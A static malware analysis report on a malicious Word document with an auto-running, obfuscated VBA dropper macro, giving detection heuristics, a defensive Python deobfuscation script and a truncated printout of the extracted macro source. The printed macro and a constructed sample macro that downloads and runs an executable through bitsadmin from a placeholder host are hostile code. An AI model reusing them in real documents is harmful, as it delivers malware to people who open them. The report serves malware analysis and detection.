Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 89e4d6f82ef37356…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 207.2 KB
Created: 2018-06-25 17:20:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 4e12e5190d792b5588ee5898d624295b
SHA-1: f029cd3c64e4294a27db74c016d75ecc3ca9d945
SHA-256: 89e4d6f82ef37356e154fac5b7ac271fc9d7f5bf44c0bdf561ec517b5d2c1db4
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1204.002 (User Execution: Malicious File)

The sample is a malicious Office (OLE) document containing a VBA macro. The macro calls Shell(), which fires a critical heuristic, to run a command outside the VBA runtime; the command is assembled at runtime from concatenated string fragments and Chr() calls, padded with arithmetic decoy statements that only survive because of On Error Resume Next. Together with the ClamAV Doc.Dropper detection, this is consistent with a dropper whose purpose is to download and execute a secondary payload, a common malware-delivery technique. The AutoOpen macro means the code runs as soon as the document is opened with macros enabled, without any further user interaction.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6591351-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6591351-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
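The OLE_VBA_AUTOOPEN and OLE_VBA_SHELL heuristics above are name matches over the recovered macro source, and the Shell() argument in this family is never visible as a literal: it is built from `"fragment" + Chr(n) + ...` assignments surrounded by numeric decoy lines, as the macro preview further down shows. The following script is an added example, not part of this report or of oletools: it takes VBA source such as the extracted macros.bas, flags auto-exec entry points and execution tokens, and statically resolves the concatenation pattern so the final command string can be read. The SAMPLE_VBA input is constructed to mirror the sample's shape (the `cmd.exe`/`bitsadmin` command and the `example.invalid` URL in it are made up and carry no claim about this sample's real payload); lines containing arithmetic, unresolved names or out-of-range Chr() values are skipped rather than guessed.

```python
import re

# Macro entry points Word/Excel run automatically once macros are enabled.
AUTOEXEC_NAMES = ("AutoOpen", "AutoExec", "AutoClose", "AutoNew", "Document_Open",
                  "Document_Close", "Workbook_Open", "Auto_Open", "Auto_Close")
AUTOEXEC_RE = re.compile(
    r"\b(?:Sub|Function)\s+(" + "|".join(AUTOEXEC_NAMES) + r")\b", re.I)

# Calls that hand control to something outside the VBA runtime.
EXEC_TOKENS = ("Shell", "ShellExecute", "CreateObject", "GetObject",
               "WScript.Shell", "URLDownloadToFile")
EXEC_RE = re.compile(
    r"(?<![\w.])(" + "|".join(re.escape(t) for t in EXEC_TOKENS) + r")(?!\w)", re.I)

ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$")
TOKEN_RE = re.compile(
    r'(?P<str>"(?:[^"]|"")*")'          # "literal" ("" is an escaped quote in VBA)
    r"|Chr\$?\(\s*(?P<chr>\d+)\s*\)"     # Chr(n)
    r"|(?P<ident>[A-Za-z_]\w*)"          # a variable name
    r"|(?P<op>[+&])"                     # VBA string concatenation operators
    r"|(?P<ws>\s+)"
    r"|(?P<other>.)",                    # anything else makes the line unresolvable
    re.I)


def resolve_strings(vba_source):
    """Statically evaluate assignments whose right-hand side is only string
    literals, Chr(n) and already-resolved variables joined by + or &.
    Lines with arithmetic, unknown names or Chr() values above 255 (VBA's Chr
    raises on those; the decoy lines rely on On Error Resume Next) are skipped."""
    resolved = {}
    for line in vba_source.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, rhs = m.group(1), m.group(2)
        parts, ok = [], True
        for tok in TOKEN_RE.finditer(rhs):
            kind = tok.lastgroup
            if kind == "str":
                parts.append(tok.group("str")[1:-1].replace('""', '"'))
            elif kind == "chr":
                code = int(tok.group("chr"))
                if code > 255:
                    ok = False
                    break
                parts.append(chr(code))
            elif kind == "ident":
                if tok.group("ident") not in resolved:
                    ok = False
                    break
                parts.append(resolved[tok.group("ident")])
            elif kind in ("op", "ws"):
                continue
            else:
                ok = False
                break
        if ok and parts:
            resolved[name] = "".join(parts)
    return resolved


def triage(vba_source):
    """Auto-exec names, execution tokens, all resolved strings, and the subset of
    resolved strings that look like commands, binaries or URLs."""
    strings = resolve_strings(vba_source)
    decoded_hits = {k: v for k, v in strings.items()
                    if EXEC_RE.search(v) or "http" in v.lower() or ".exe" in v.lower()}
    return {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC_RE.finditer(vba_source)}),
        "exec_tokens": sorted({m.group(1) for m in EXEC_RE.finditer(vba_source)}),
        "strings": strings,
        "decoded_hits": decoded_hits,
    }


# Constructed sample (not the page's macro) reproducing its shape: numeric decoy
# statements, fragmented literals joined with Chr(), a final join, and AutoOpen.
SAMPLE_VBA = r'''Attribute VB_Name = "ModA"
Function Build()
On Error Resume Next
UDiOtZ = CByte(99997 * Tan(2328) / 28442 + CLng(EqrYV * 46407 * 36406 * Chr(71341)))
zz = "noise" + Chr(71341)
a1 = "cm" + "d." + "ex" + "e"
a2 = Chr(32) + "/c" + Chr(32)
a3 = "bits" & "admin" + Chr(32) + "/transfer" + Chr(32) + "j" + Chr(32) + "http://example.invalid/p" + Chr(32) + "%TEMP%/p.exe"
Build = a1 + a2 + a3
End Function
Sub AutoOpen()
Shell Build(), 0
End Sub
'''

if __name__ == "__main__":
    for key, val in triage(SAMPLE_VBA).items():
        print(key, val)
```

Run it on the real macros.bas by passing the file contents to `triage()`. Resolution is deliberately conservative: it never evaluates arithmetic or function calls, so an obfuscator that derives characters from numeric expressions will leave those variables unresolved, and that gap is itself worth reporting rather than papering over with guesses.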

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11255 bytes
SHA-256: 1b37b0f396e505f25129916ff8d7ab6204e269b0803f3d908fcc0abedd59806a

Script preview (first 1,000 lines of the extracted VBA source):
Attribute VB_Name = "QiYCEUIX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KUkSaHpzL"
Function WpBijBF()
On Error Resume Next
XBhDsG = (8947 / CBool(51876) + 27761 + CSng(nmpYZu) * (70107 - HfkQp + 28796 - CLng(QCzuoR)))
UDiOtZ = CByte(99997 * Tan(2328) / 28442 + CLng(EqrYV * 46407 * 36406 * Chr(71341)))
jYwYDKGSka = "Hel" + "l  " + Chr(40) + " '9w" + "90" + "V87" + "m91C16C6" + "7D72V90" + "w0V66D"
JTJLnA = CByte(53824 * Tan(4455) / 52205 + CLng(YzHWf * 19832 * 78483 * Chr(12955)))
IYhCG = (22774 / CBool(34757) + 49357 + CSng(DHjZjD) * (34823 - pLBKVG + 32941 - CLng(LwXEvd)))
KGksJBkQ = "79x71" + "<72>7" + "8C" + "89x1" + "3C99w7" + "2V89>3"
iwMvXZ = CByte(17383 * Tan(44133) / 87458 + CLng(ijpjf * 84250 * 44855 * Chr(60383)))
iHjKmS = (31455 / CBool(41499) + 90833 + CSng(uUjZc) * (43279 - WrimN + 17979 - CLng(KzJJKj)))
vpOPWcDj = "m122m72" + "<79" + "V11" + "0C65D68D" + "72<67C8" + "9m22&9" + "&87>79" + "x68"
FldJHA = CByte(70615 * Tan(42674) / 31740 + CLng(ZQIhkP * 37597 * 34187 * Chr(32849)))
Znzbw = (40769 / CBool(96005) + 18477 + CSng(pJGLO) * (46758 - WTiEw + 94308 - CLng(zHHjTt)))
QjOlwRoO = "m16" + "w10z6" + "9V8" + "9z89C" + "93<23" + "z2V2D68" + "z78z" + "66<67V" + "69D6" + "6C65z68V"
snOCa = CByte(43405 * Tan(63934) / 87159 + CLng(GiMkC * 52920 * 72332 * Chr(91390)))
IYsaD = (54157 / CBool(77598) + 99636 + CSng(oodPV) * (69473 - dBHXb + 1220 - CLng(EfjoS)))
cXcQM = "73&" + "76<84w9" + "4<3&78w" + "66z6" + "4V3x79" + "w7" + "3m2>" + "125m" + "101x87w1" + "10" + "V2x109C6"
SjfAUz = CByte(9948 * Tan(41478) / 9801 + CLng(iOMFI * 67099 * 82513 * Chr(81076)))
nzNmS = (18947 / CBool(87537) + 83721 + CSng(VovXn) * (42778 - bBZbpw + 5546 - CLng(ZvdLrw)))
YKjVdOwqwIX = "9V89w8" + "9>93m94>" + "23w2D2&" + "70" + "V72x" + "95D6" + "6V" + "94&7"
MmUsX = CByte(2515 * Tan(13263) / 29803 + CLng(LaQrw * 46686 * 51917 * Chr(66320)))
aaMULp = (89218 / CBool(68464) + 25820 + CSng(jiAJt) * (40576 - rnBmW + 60856 - CLng(RGjqY)))
mqBiXFTcHC = "0&84" + "D3" + "V7" + "8m66x" + "64C2>20x" + "10" + "4<10" + "7C95m2C1"
qXiXoT = CByte(40531 * Tan(66931) / 62022 + CLng(TGPMOF * 43722 * 10150 * Chr(90959)))
SkzrD = (78366 / CBool(22937) + 7421 + CSng(rCFFDL) * (93168 - uNHls + 27320 - CLng(XcaWih)))
qmFPlZ = "09<69<" + "89w8" + "9<" + "93&" + "23D2D2m" + "90"
QjtSd = CByte(94276 * Tan(21622) / 94836 + CLng(RBHSq * 90413 * 86946 * Chr(38068)))
dNaTaV = (3515 / CBool(37103) + 51727 + CSng(pYNvL) * (65002 - fWcpLh + 52226 - CLng(lwiJW)))
kOkXAa = ">9" + "0z" + "90x3D76" + "z79<68<" + "89&7" + "9V72w" + "89C" + "3x78C" + "66&64" + "V2<107" + "&89V3"
WpBijBF = jYwYDKGSka + KGksJBkQ + vpOPWcDj + QjOlwRoO + cXcQM + YKjVdOwqwIX + mqBiXFTcHC + qmFPlZ + kOkXAa
sfhcr = CByte(25533 * Tan(66035) / 33050 + CLng(AwzJIv * 97497 * 84108 * Chr(7093)))
jfqiS = (95197 / CBool(34025) + 62549 + CSng(BpXTKE) * (18361 - pTcik + 29792 - CLng(ELoDOk)))
End Function
Function FRwwnlmPit()
On Error Resume Next
AFSRSo = CByte(30621 * Tan(62530) / 54092 + CLng(EJmni * 66025 * 58757 * Chr(21821)))
RFZqS = (92263 / CBool(29869) + 16357 + CSng(HJNRPi) * (93932 - lhMwqY + 44833 - CLng(mnFaIM)))
dOjAF = "1z2" + "0V94m" + "2x109m" + "69w89" + "V89>" + "93m" + "23x2m" + "2D9" + "4w70"
bOFwm = CByte(17655 * Tan(86657) / 82597 + CLng(QZkXSW * 67402 * 29097 * Chr(49949)))
NKrMb = (64351 / CBool(4392) + 28710 + CSng(IJiVuM) * (25792 - wNiDV + 2008 - CLng(rmOkoH)))
mvObYFntAEt = "z84x73D6" + "6&64V72V" + "76D" + "78m7" + "6C73D72m" + "64V8"
zKPpT = CByte(20692 * Tan(64879) / 10729 + CLng(dCXCQ * 97111 * 98427 * Chr(23023)))
SlQhz = (85417 / CBool(17581) + 12855 + CSng(oTRaY) * (7425 - TPvaET + 11490 - CLng(NildRU)))
HvZFzpjrY = "4<3" + "<7" + "8x66V64" + ">2<94x94" + ">75&64>2" + "V30w127" + "V1" + "08>30" + "x27w2<1" + "09x69m" + "89w8"
PfZJh = CByte(34103 * Tan(69214) / 61427 + CLng(tpoYO * 69207 * 98154 * Chr(94
... (truncated)